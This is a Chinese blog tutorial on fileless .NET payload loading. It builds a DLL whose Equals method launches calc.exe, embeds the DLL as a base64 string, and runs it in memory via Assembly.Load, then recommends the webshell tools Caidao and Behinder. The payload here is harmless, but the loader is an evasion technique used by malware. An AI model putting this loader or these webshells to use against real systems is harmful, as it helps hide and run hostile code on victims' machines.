分类:
.net后台框架
1.准备
1,新建一个ActionNew控制台的项目
2,新建一个ProcessCale类库项目
如图:
2.payload核心部分(ProcessCale.Payload)
Payload.cs:
using System;
using System.Diagnostics;
namespace ProcessCale
{
class Payload
{
public override bool Equals(Object obj)
{
Process.Start("calc.exe");
return true;
}
}
}【注意】:此处我用得有命名空间,可以把命名空间去掉
3.将ProcessCale.dll文件转换base64
代码就懒得写了直接用它这个网站就可以了
Url: https://www.base64encode.org#encodefiles
Copy That
4.ActionNew主体部分
using System;
using System.Reflection;
namespace ActionNew
{
class Program
{
static void Main(string[] args)
{
string Payload = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAMUmZYsAAAAAAAAAAOAAIiALATAAAAgAAAAGAAAAAAAAQicAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAO4mAABPAAAAAEAAAIgDAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAABYJgAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAASAcAAAAgAAAACAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAIgDAAAAQAAAAAQAAAAKAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAADgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAiJwAAAAAAAEgAAAACAAUAeCAAAOAFAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwAQASAAAAAQAAEQByAQAAcCgPAAAKJhcKKwAGKiICKBAAAAoAKgBCU0pCAQABAAAAAAAMAAAAdjQuMC4zMDMxOQAAAAAFAGwAAADkAQAAI34AAFACAABYAgAAI1N0cmluZ3MAAAAAqAQAABQAAAAjVVMAvAQAABAAAAAjR1VJRAAAAMwEAAAUAQAAI0Jsb2IAAAAAAAAAAgAAAUcVAgAJAAAAAPoBMwAWAAABAAAAEQAAAAIAAAACAAAAAQAAABAAAAAOAAAAAQAAAAEAAAACAAAAAACqAQEAAAAAAAYAAQELAgYAbgELAgYANQDZAQ8AKwIAAAYAXQDBAQYA5ADBAQYAxQDBAQYAVQHBAQYAIQHBAQYAOgHBAQYAdADBAQYASQDsAQYAJwDsAQYAqADBAQYAjwCMAQYASQK6AQoAQQLZAQAAAAABAAAAAAABAAEAAAAQABMAGwBBAAEAAQBQIAAAAADGADoCLQABAG4gAAAAAIYY0wEGAAIAAAABAKYBCQDTAQEAEQDTAQYAGQDTAQoAKQDTARAAMQDTARAAOQDTARAAQQDTARAASQDTARAAUQDTARAAWQDTARAAYQDTARUAaQDTARAAcQDTARAAeQDTARAAiQBQAh4AgQDTAQYALgALADIALgATADsALgAbAFoALgAjAGMALgArAHQALgAzAHQALgA7AHQALgBDAGMALgBLAHoALgBTAHQALgBbAHQALgBjAJIALgBrALwALgBzAMkAGgAEgAAAAQAAAAAAAAAAAAAAAAAbAAAABAAAAAAAAAAAAAAAJAAKAAAAAAAEAAAAAAAAAAAAAAAkALoBAAAAAAAAADxNb2R1bGU+AG1zY29ybGliAFBheWxvYWQAUHJvY2Vzc0NhbGUAR3VpZEF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBvYmoAUHJvY2Vzc0NhbGUuZGxsAFN5c3RlbQBTeXN0ZW0uUmVmbGVjdGlvbgAuY3RvcgBTeXN0ZW0uRGlhZ25vc3RpY3MAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMARGVidWdnaW5nTW9kZXMARXF1YWxz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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==";
Assembly myAssebly = System.Reflection.Assembly.Load(Convert.FromBase64String(Payload));
Object myPaylaod = myAssebly.CreateInstance("ProcessCale.Payload");
myPaylaod.Equals("");
}
}
}这里的Payload就是复制下载下来的文本
Run:
额外说明:
最近听网友说国内渗透工具 菜刀是废了,c刀还能用用,最新的是冰蝎
有兴趣可以去了解一下冰蝎
Github:https://github.com/rebeyond/Behinder
欢迎加群讨论技术,1群:677373950(满了,可以加,但通过不了),2群:656732739
评价
排名
6
文章
6
粉丝
16
评论
8
{{item.articleTitle}}
{{item.blogName}} : {{item.content}}
ICP备案 :渝ICP备18016597号-1
网站信息:2018-2024TNBLOG.NET
技术交流:群号656732739
联系我们:contact@tnblog.net
公网安备:
50010702506256
50010702506256
欢迎加群交流技术